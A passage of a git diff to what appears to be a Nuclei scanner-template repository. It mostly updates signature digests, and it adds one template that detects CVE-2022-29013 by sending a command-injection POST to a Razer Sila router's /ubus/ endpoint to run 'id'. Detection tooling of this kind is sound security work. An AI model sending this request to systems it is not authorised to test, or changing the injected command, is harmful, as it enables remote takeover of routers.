4a0a00473045022100b65a58c011a1ca1bccb5b49e72d7a2e13bd7ed8f927c597dea568cc99763f05c0220795448956a78ec132ee1dcf7d8773447335ebdafa10a3f1a36974785c7488b4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008ba31c9c82e3d2016b0e39007d322dda9dd974dd85f6112e1b2ec69f3d02d4af022100e175d0b3e653876624f486f5a9a616358108cdb0ffe8b51a26095d719cd9e90b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19365.yaml b/http/cves/2018/CVE-2018-19365.yaml index 7ac3fedd97..2b040cfd71 100644 --- a/http/cves/2018/CVE-2018-19365.yaml +++ b/http/cves/2018/CVE-2018-19365.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200cfc7e43600b8bd1d4fb319ccffd38a08bf002e33499bc92b2294575fa90d5030220175d25d514ffd254d59e34e6c6250789c5a89cbef16920c6167a333b89ebb817:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205881865c2d431ab04277b58b64164a5d9a9e8ded65bae4b0db26e4223352565b02201a8e40546fc42fd6793c303617c6bd7399592710dbb328752a90e8840feaa8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19386.yaml b/http/cves/2018/CVE-2018-19386.yaml index 4598f3ac5d..fee4a77a5f 100644 --- a/http/cves/2018/CVE-2018-19386.yaml +++ b/http/cves/2018/CVE-2018-19386.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b192fb6228fee3c66aef5f7f5c0b88e048d85e9a5cce6746b720c01dc25d5d1402200ad457e9d5c195b4a68da36c77731f5db1ef68fe0e48c747ec545544a280fb21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cb661a6ea402a8fe1df0ba6f686efa2e17994e84eb11f9c17383364f88f285880220308c0de4c8f2b5e65feb3809c645cc919a6494252251cc678e86295fca8383a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2018/CVE-2018-19439.yaml b/http/cves/2018/CVE-2018-19439.yaml index bc1e1c1ff0..509be08df3 100644 --- a/http/cves/2018/CVE-2018-19439.yaml +++ b/http/cves/2018/CVE-2018-19439.yaml @@ -38,4 +38,4 @@ http: part: body words: - "
" matchers-condition: and matchers: @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220498daacfac07d3acd8f9c1dfa48fcf211dbd96d0ebfb7f667aeb0badc4078c8602205eb7cfdb487bc3ab48c0681082ac620f6913e659310fab893312e759f5dfb37e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220089ea67dd284fdc9cb5f8561b1d4bfc2fa8b0ba255e1fe4da91db549c933880402206b98099cbbb46f8c4ce87cdf7839a7b3cbd0a01ebb6f36669538d9351f172edd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26352.yaml b/http/cves/2022/CVE-2022-26352.yaml index 02c94c600e..9c61ad1df1 100644 --- a/http/cves/2022/CVE-2022-26352.yaml +++ b/http/cves/2022/CVE-2022-26352.yaml @@ -54,4 +54,4 @@ http: - 'contains(body_2, "CVE-2022-26352")' - 'status_code_2 == 200' condition: and -# digest: 4a0a00473045022100e3f85a735428e0750249698ff56ea607392ab8c7384ab2253d8d4b9be514ba230220703d1aa0af80faba68005fe1751f17d54fcfeb01fd52ce25c7fa0e669d6ab478:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009c0b8e26c1757e843516d1eb93bbf57c5a4c28cc367a24ab2913efc1c620261f02203b7f5ecae948b47821751b0eb7531ddf83eceedbcf0ad01c51e5710a9da998bb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26564.yaml b/http/cves/2022/CVE-2022-26564.yaml index 34ca3333c0..0dcca515bd 100644 --- a/http/cves/2022/CVE-2022-26564.yaml +++ b/http/cves/2022/CVE-2022-26564.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100de16be9fd69b867ba31c0ce404e6527f3a473cd2ff6873a666911d1afa56a0c80220322b078e5b6dc18312695b4424fe98eff8240f8c1f4247b40b889ec670f41e19:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cce687826fa0938f4944c77a726102f036638a7225beea50d91d7f4aba881ee4022100d38d31a915a08dd7ac2ccff9c5cdb5683ccf782cc375359389be457f415998d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26833.yaml b/http/cves/2022/CVE-2022-26833.yaml index 4048bf7acb..b20f2cee89 100644 --- a/http/cves/2022/CVE-2022-26833.yaml +++ b/http/cves/2022/CVE-2022-26833.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b110779983be81ea1785c88518245f1c7d2df54797e3ea86bfd4a642fea79cc00220617b524a29b4873806b53c1a76a9d81e7f65cd9cd0ecd6b56882a8aa824a0b52:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008b2b1617febe8dccc10821928bbfc6ef217f8c13d190a4e1331680c32dce97eb02206ef9889f401735822755bfeff09044d1c95a75aaa4f9225590a5d412ec8ef929:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-26960.yaml b/http/cves/2022/CVE-2022-26960.yaml index c15f3e8c37..e231a5d9bb 100644 --- a/http/cves/2022/CVE-2022-26960.yaml +++ b/http/cves/2022/CVE-2022-26960.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204cc48b95204bec849af8cb9b0c2a887407df7d9931f1c1d26fa625985f6a144e02203c8acd3a044c0f112ed2af89d5cf6ca48ff3d1c9a075a17717dca297ea10bb80:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b51a2dee0a9598c7c1f521f9373c5bb35728dda0693010a4db82ab044f7124d4022006a5200a4741c2b9c8d1102b86fd448d48abe1e0af4e543f0ea00920ed47e9ee:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2733.yaml b/http/cves/2022/CVE-2022-2733.yaml index c14b42e8cb..a699662226 100644 --- a/http/cves/2022/CVE-2022-2733.yaml +++ b/http/cves/2022/CVE-2022-2733.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e896da72dd8658f2ac47e0c68a510204fdba89341b4411d212ff800f8576d06a022100d79321ee5ee63713cfcede06a2752aae33d5b330f270df79cb4454fce4280067:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022067808d2ef89464f8783342be709967c65dd881e44614eb5c38c240f26f031a7c02201f9e9db2f41292d877197f390bc061a2bf455dc58d83e13a92b5baa0612b7cc4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2756.yaml b/http/cves/2022/CVE-2022-2756.yaml index 91b57bb9ff..7aa6b01048 100644 --- a/http/cves/2022/CVE-2022-2756.yaml +++ b/http/cves/2022/CVE-2022-2756.yaml @@ -82,4 +82,4 @@ http: regex: - coverupload.(.*?).png internal: true -# digest: 4a0a00473045022100ac1b45f1b682dd026a3417d70aa143bf039b3daaae4c0d917ca3688f53880b3c022074d2d18934fadc4b6a2c8e900feb71972f1ad6675c6bedfba73194fc3b402ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210085857e4680115374eb6a9159f4e37003a795b63ad4ad57ea849bb25b04ec899c022100ceac60030e13ddb109cf88cfcaf3066ff8140a87aed39031c9429979c6d07952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27593.yaml b/http/cves/2022/CVE-2022-27593.yaml index e95e56b2b6..7ac8e90f4b 100644 --- a/http/cves/2022/CVE-2022-27593.yaml +++ b/http/cves/2022/CVE-2022-27593.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220534c8a54d0ab5457430be4c2c8632e67cc5e772e0032304455375a2f8caa9907022100aeebdc96a43725955711832c2f9a09169a353b552e3a5484a913b5e179659916:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029ff7ca9eec78f978cca636c260d69c4dd0975c46068c8d981049465b985c390022100d935e9c82c8fbb7d5cf9b1a5ffaef6ff36ceb942e8d2df6a703342de6a8c829e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27849.yaml b/http/cves/2022/CVE-2022-27849.yaml index 4454d29eed..8aa1ca42b3 100644 --- a/http/cves/2022/CVE-2022-27849.yaml +++ b/http/cves/2022/CVE-2022-27849.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b17dc6400d273fe4c5960316b1c02cb0f6187e2f2dda1ae610b48ca88fdbea6f022078f71ff76d3033b711e3368cd209c6c0cfc4876ae6374e50e0d46e3cf34a3314:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200ac201e5da2db9585d76d187f6a6ede0350f1c6230c3c80676234cb41a9e8259022037d381d175e583e6490612c81f07c12a325a2dc7252ba6dcc9f5d27cc59d94d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-27985.yaml b/http/cves/2022/CVE-2022-27985.yaml index dfd78af5e3..ea4907b28b 100644 --- a/http/cves/2022/CVE-2022-27985.yaml +++ b/http/cves/2022/CVE-2022-27985.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e1689de7e100d1cf3cd6cb0088c58a5e7a55aa5e12d8d4a92eba0dbe6cf2c5fd02202c384a03f7128fe4d5c6ec0407b5df3cb36f265bfbb7c29ec092f1536f13177a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100840dc614f9b8dc4a922d2ecf069a41511326c836f551341d59ca5f56b6d3e2aa02206d9425bf0e7a02ee89a404733062fac7773ec9a5c2166c8a56d00fc1ef080f12:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28023.yaml b/http/cves/2022/CVE-2022-28023.yaml index 01e691d3a5..c5e0cd719c 100644 --- a/http/cves/2022/CVE-2022-28023.yaml +++ b/http/cves/2022/CVE-2022-28023.yaml @@ -48,4 +48,4 @@ http: - 'contains(header, "text/html")' - 'contains(body, "status\":\"success")' condition: and -# digest: 4a0a00473045022100fc3166684dbed49e4c5480f7505cf4fcd4f48658c9601781b86cdbfc4cb78a2802206f02e3f8f5579d8c285d5f896899ed35cf8ece4155ec05b01ca285bb96680bef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202679435e70ec7ff77e6356d469e8b023129f6b3378ff568e3d494c06c9bd77530220519ab2ca116d285eff6637fc9215b435f91e6d061fdfc904ee37adad8e051fd6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28032.yaml b/http/cves/2022/CVE-2022-28032.yaml index b5090af060..dab4e32a34 100644 --- a/http/cves/2022/CVE-2022-28032.yaml +++ b/http/cves/2022/CVE-2022-28032.yaml @@ -43,4 +43,4 @@ http: - 'status_code == 200' - 'contains(body, "Page Deleted")' condition: and -# digest: 4b0a00483046022100c3dcaf228f36717b9b892921c79ce537dca09d6de71718237273b190261aaecc022100c2ea3398fe81fc61efd816bad09b054cae571fdf32fcdf78b912a7f054a8bfc2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210094d3f24fad25a6ad53537e08fc90fcff2bc0b990b179300cf9ca237b2cb0ddc0022100b1f33b959d642b04732cc8fa792d91295bd120f8cef3e993037a2ebf0ab3665c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28080.yaml b/http/cves/2022/CVE-2022-28080.yaml index 989deca8c2..9076309976 100644 --- a/http/cves/2022/CVE-2022-28080.yaml +++ b/http/cves/2022/CVE-2022-28080.yaml @@ -79,4 +79,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220196dcb5e52aba8c77b409574ee252c61dff3ff5b5fd8a60937612b0c305cba15022100aacbe1176573d6147aa86038344dfa8517c6da7a17266185eb98c8baa4e220b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206f49180b6302f9fef0412af1682487a99e8e841803be35372ea552f7878da30e022034287c08d99ef3e984b6ba91845fc4b18462d620c01f5ea9326718da215d237f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28290.yaml b/http/cves/2022/CVE-2022-28290.yaml index 6280f72923..174f43ac00 100644 --- a/http/cves/2022/CVE-2022-28290.yaml +++ b/http/cves/2022/CVE-2022-28290.yaml @@ -64,4 +64,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cbabb09ae74bbc1d8af52bb36bc66844788ce56fb3c02a7b1da6263cc7bf91ba0221008e8a17fc98180daa9eeb388a3b87198ce400f215ab3df21978284130f8537c87:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ebe533ef2ec09740f696d061f09daee596b1bfa0a1a88c9b3fe5abd00eeddd9e02205eca23209af224a5ef2c7ab7d53b737c3db0bb4012a36bf2b6c193725f4d3ae6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28363.yaml b/http/cves/2022/CVE-2022-28363.yaml index 5cda1f8025..c610bcd0dc 100644 --- a/http/cves/2022/CVE-2022-28363.yaml +++ b/http/cves/2022/CVE-2022-28363.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009cabb9f3b7b245bdc3be120583ff229a0be196081974f54a7d9fc5d1ed16f053022076cc6d5c2920f4afcaa7901929fba1fdc79b7cc28e3911318c7d24597a994277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210083399ab30c18aa4ee9e8a8dc77c6a1dc50feb2092036ee0a9fea49eba0c770a4022100aba47004ae87a814261cb712697ce39cb06ac5da29c432abb75c5ec9fac9738c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-2863.yaml b/http/cves/2022/CVE-2022-2863.yaml index 511fe0158b..4a90bb1dea 100644 --- a/http/cves/2022/CVE-2022-2863.yaml +++ b/http/cves/2022/CVE-2022-2863.yaml @@ -64,4 +64,4 @@ http: - '"_ajax_nonce":"([0-9a-z]+)"' internal: true part: body -# digest: 4a0a00473045022100e06086c4951ee3fa39d3a71a6d4374a3ed70eb52ffc595926ce3bd1a47ad15ba022004e65bd09a9eeb347426333b36abc41196a0375a7758164c35d13d39408d2494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fbf116fc126c32cb636b41b96e4869401ddff061cb73fbccdef08cfaab0c1e8202205d457dcc5c48196ab73bbbe156a7df100c74e1dc1279c0467df579ebe105a8f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-28955.yaml b/http/cves/2022/CVE-2022-28955.yaml index 8ed1d5ed20..03e70e6f8d 100644 --- a/http/cves/2022/CVE-2022-28955.yaml +++ b/http/cves/2022/CVE-2022-28955.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203592da06bcc4cba34a72d1962715d8db6d7e4706f92906990dfcd8e323f38bc8022077b65af109b146a3d25aa52ca8c962b18dec5ff877341fbddd9dac83ee18becd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022009d76438f14aca1cbc33ea695332b672ebdff31d2dba9171ba069cdf40c9b226022014e620a8fe211c0a70a706c03df6e4bd5961dff7ba59ca7bcb8c2c869e063a28:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29004.yaml b/http/cves/2022/CVE-2022-29004.yaml index a92d8576e3..a46c5f606e 100644 --- a/http/cves/2022/CVE-2022-29004.yaml +++ b/http/cves/2022/CVE-2022-29004.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009fd5874d58bbab57b411a5f4bb655f4f92c7f0de3002e2b90e9d8218dfa6e32702201b483e436c9a02e7e8d210dd6b297a5f2000bb675ff43977f0d24ce46b40accd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d9e1bedfff4118b3279485a5986c26b55fb4f70309678e686a3a2f739891d72402210097dbc2e593923e391651673ae5b43eb1eb8fca5089adec8517b32b625de2b72e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29006.yaml b/http/cves/2022/CVE-2022-29006.yaml index 5127137d91..9c23d4c891 100644 --- a/http/cves/2022/CVE-2022-29006.yaml +++ b/http/cves/2022/CVE-2022-29006.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bc32ad970d860956d3d807a4562bdee5316cc59bffd2fbd44883ff7051422ae102206a3c07f4c23cca141f0a20f8d7fe0a3dc2ef1b9f7e95e116193bc3b3d4e311e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b032a0928542b07c129e656f021862237782c6d5334e70b894ab4ebcca9585c4022100f96c4c46eee96e11abe556a475886c305dbe89a53f3ba87b4a652358759cead5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29009.yaml b/http/cves/2022/CVE-2022-29009.yaml index 57e4c481a1..a752cb053f 100644 --- a/http/cves/2022/CVE-2022-29009.yaml +++ b/http/cves/2022/CVE-2022-29009.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bfc815b4efdedda442ad922f761b828b02d86f8fdb61aedab9b147267034643702203d3216819f4c08b5ac424cbbac6baf6c593b3300a839ef7bc37343a1c184c2d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4332b09e1cc097f4cca16a0121cafbffab109672f9245168e86edf8bf26a0c902210099acc93d9117952cce48b5e857f1d8151fc10df6beebece0164404381d30a846:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29013.yaml b/http/cves/2022/CVE-2022-29013.yaml new file mode 100644 index 0000000000..bdf099ede5 --- /dev/null +++ b/http/cves/2022/CVE-2022-29013.yaml @@ -0,0 +1,52 @@ +id: CVE-2022-29013 + +info: + name: Razer Sila Gaming Router - Remote Code Execution + author: DhiyaneshDK + severity: critical + description: | + A command injection in the command parameter of Razer Sila Gaming Router v2.0.441_api-2.0.418 allows attackers to execute arbitrary commands via a crafted POST request. + reference: + - https://packetstormsecurity.com/files/166684/Razer-Sila-2.0.418-Command-Injection.html + - https://nvd.nist.gov/vuln/detail/CVE-2022-29013 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2022-29013 + cwe-id: CWE-78 + epss-score: 0.83254 + epss-percentile: 0.98361 + cpe: cpe:2.3:o:razer:sila_firmware:2.0.441_api-2.0.418:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: razer + product: sila_firmware + tags: packetstorm,cve,cve2022,razer,sila,router + +http: + - method: POST + path: + - "{{BaseURL}}/ubus/" + headers: + Origin: "{{RootURL}}" + Referer: "{{ROotURL}}" + X-Requested-With: XMLHttpRequest + body: | + {"jsonrpc":"2.0","id":3,"method":"call","params":["30ebdc7dd1f519beb4b2175e9dd8463e","file","exec",{"command":"id"}]} + + matchers-condition: and + matchers: + - type: regex + part: body + regex: + - 'uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)' + + - type: word + part: header + words: + - "application/json" + + - type: status + status: + - 200 +# digest: 490a0046304402207cbb58a7c97c66bfec2ae1b2ea9efe5dd2c11d2f9ce7517c4f72aa7e6508b86002204dbae1299fc556dc6cc9ac476fb7c9c775c572f5aff45a220b6738b28985bd35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29014.yaml b/http/cves/2022/CVE-2022-29014.yaml index fb300306f9..6fd1794a52 100644 --- a/http/cves/2022/CVE-2022-29014.yaml +++ b/http/cves/2022/CVE-2022-29014.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220532815e90525e6c36e006e8a2451075c177a55db0c1790236d2b5f29c3618647022100cdf84bfc2a38e4a63bdc7b37f39e8f2e0d0b293d2d2d329a7138eddfc94c1975:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fa422597b17ed8103daea7b9b7c129502f25b691034e1c73b5e6f98089537455022042b8117c0c1f7a96f5dfed6a5cc2244e045d23ecfb50bd7a34715f8bf79b1d20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29078.yaml b/http/cves/2022/CVE-2022-29078.yaml index 84aedb33a9..05c6a4b16d 100644 --- a/http/cves/2022/CVE-2022-29078.yaml +++ b/http/cves/2022/CVE-2022-29078.yaml @@ -48,4 +48,4 @@ http: part: body words: - You are viewing page number -# digest: 4a0a0047304502205e40730051da946b7de1302824141a6efe7cf90cedf162e7628d7ae0aa204dea022100c71171791b9e4e21136ff35a4d232b8d8f23becb94bd09fa64e47af0866482d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203db3f45d8e15e58d60c2a0c268f52014feead1fa99568158768c91a2580e313b022100efb19def318800319766279d5e0fbf144650bf5b861b85f3f6bfa291878bd107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29153.yaml b/http/cves/2022/CVE-2022-29153.yaml index 43b3644f47..cde1288f15 100644 --- a/http/cves/2022/CVE-2022-29153.yaml +++ b/http/cves/2022/CVE-2022-29153.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 400 -# digest: 490a00463044022066370321406407539bc4d3c18e6242087e498fd9433ede30028efff529bcf7ca02203e21c76a893d42fd33960f854c178225805fe1dafd168d171d258985ffa0f3ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ad57775f28b340323e6c238f83d7ff7d527ca0f9ea5bad34f1516a2ced3e64c7022057c3fb9256242477b86e3a94db3ab1e5b0992646c61019b6e2eb284ae7e03696:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29298.yaml b/http/cves/2022/CVE-2022-29298.yaml index 94c1340eaa..38ffe1f6b1 100644 --- a/http/cves/2022/CVE-2022-29298.yaml +++ b/http/cves/2022/CVE-2022-29298.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d8425b3afe0ecce3ee761c4825a9ab02f7d01ba0b4ffcea6d76cf6d9f565c8c0022100ca3308076597ea4992501bd4c048cae0e11ab97b882bae8a4145c94b5edccba3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29299.yaml b/http/cves/2022/CVE-2022-29299.yaml index 7e8be5ef43..d334a36759 100644 --- a/http/cves/2022/CVE-2022-29299.yaml +++ b/http/cves/2022/CVE-2022-29299.yaml @@ -47,4 +47,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203e129a5afe658e347ec99c2de40b0787bbb09d561e723f1680a30a03f595475002205f7e3014430e7bdf84b785c9afd4f48a656a8e07f606998f5197ecb8bfe102d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29303.yaml b/http/cves/2022/CVE-2022-29303.yaml index 08e1e1b8cf..3f9b0f07ff 100644 --- a/http/cves/2022/CVE-2022-29303.yaml +++ b/http/cves/2022/CVE-2022-29303.yaml @@ -55,4 +55,4 @@ http: part: body words: - "p1_network_mail.cgi" -# digest: 4a0a00473045022100fa7d94758e4bd168e5ed6352324ae8eeab89ead5ee4272184e66b7a683f76f5c022039cb27d74384bc958684e69719228d4b3cea8c749cc6267fe3a32ec3feab9041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29383.yaml b/http/cves/2022/CVE-2022-29383.yaml index eefc57a1b0..27acda9ae8 100644 --- a/http/cves/2022/CVE-2022-29383.yaml +++ b/http/cves/2022/CVE-2022-29383.yaml @@ -52,4 +52,4 @@ http: - contains(body_1, "User authentication Failed") - contains(body_2, "User Login Failed for SSLVPN User.") condition: and -# digest: 4b0a00483046022100ba4836dee0b492c270ce504a15f4102dda23f9ad00d917c739305f09d40311f80221009d65701b3ecfe3725f60c17d162379ec49f2def9d27cc081cefefa59e53387b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f45d3739c471c0247ab5ddaef54f66b34aa714db5eed11fca164bde53a9d21d502207dba6b386eb95fb5189116296ed35657baa078f1332abcdf1f821b72666ba758:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29464.yaml b/http/cves/2022/CVE-2022-29464.yaml index 6f403c6211..be282d3374 100644 --- a/http/cves/2022/CVE-2022-29464.yaml +++ b/http/cves/2022/CVE-2022-29464.yaml @@ -53,4 +53,4 @@ http: - type: dsl dsl: - "contains(body_2, 'WSO2-RCE-CVE-2022-29464')" -# digest: 4b0a004830460221008fdf074d7ee89e46cbd23b3216e1bdebb4ccc4062726776530e5783869ef76ba022100a5f4dd09134582f3026c5b60a05f094eb8764eecc575ef4358557c493b534a9a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206626d39352045dab0703dbd61d9cecafd6e7f18e8d9316bef52d936ca126b399022100d448de4461fe4835998a05ef187668142f89f7025b11abe66e0e3305508c1171:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-29548.yaml b/http/cves/2022/CVE-2022-29548.yaml index d634faa971..5cdf4a3d75 100644 --- a/http/cves/2022/CVE-2022-29548.yaml +++ b/http/cves/2022/CVE-2022-29548.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402200ed4841d50a3a18aa5c1ff5f5ff4677a13e073bd7ea2fcbd7494f48f98a0d58c022043e7b567e9578155d39f12191113e7196346395c1db482a793fb369e0a95ebef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30073.yaml b/http/cves/2022/CVE-2022-30073.yaml index c29bc4ab47..8e51358733 100644 --- a/http/cves/2022/CVE-2022-30073.yaml +++ b/http/cves/2022/CVE-2022-30073.yaml @@ -77,4 +77,4 @@ http: - '' internal: true part: body -# digest: 490a0046304402207f186c28ea58a6f8f9598e70952c20201d48b26a8a1a748541f5e9519d702637022027f11bcfdcb48f54104817a6ee4db36231ef8ff03ae9b2f7f7c2f1f196be6b24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30513.yaml b/http/cves/2022/CVE-2022-30513.yaml index 2ccf3faffb..d744e95727 100644 --- a/http/cves/2022/CVE-2022-30513.yaml +++ b/http/cves/2022/CVE-2022-30513.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206b2b73adf8ae5868612f5d9d4b052b017e5b84635b5aeae978f7148433f28c3f02210092c203307d3c12f749ec43b80e84bc1ac344e9cd6aa317227de8c22c00313b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022055880a1d2bd6c83c488dd0360a5e4c17e959313d13984eb03f1acbb91d91486e02202fa6c8f1c60e3b6aa7804866b86adead45cd8933590438437a1263b8e20319c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2022/CVE-2022-30514.yaml b/http/cves/2022/CVE-2022-30514.yaml index 81a1e1c3e1..70cbd9eb9d 100644 --- a/http/cves/2022/CVE-2022-30514.yaml +++ b/http/cves/2022/CVE-2022-30514.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 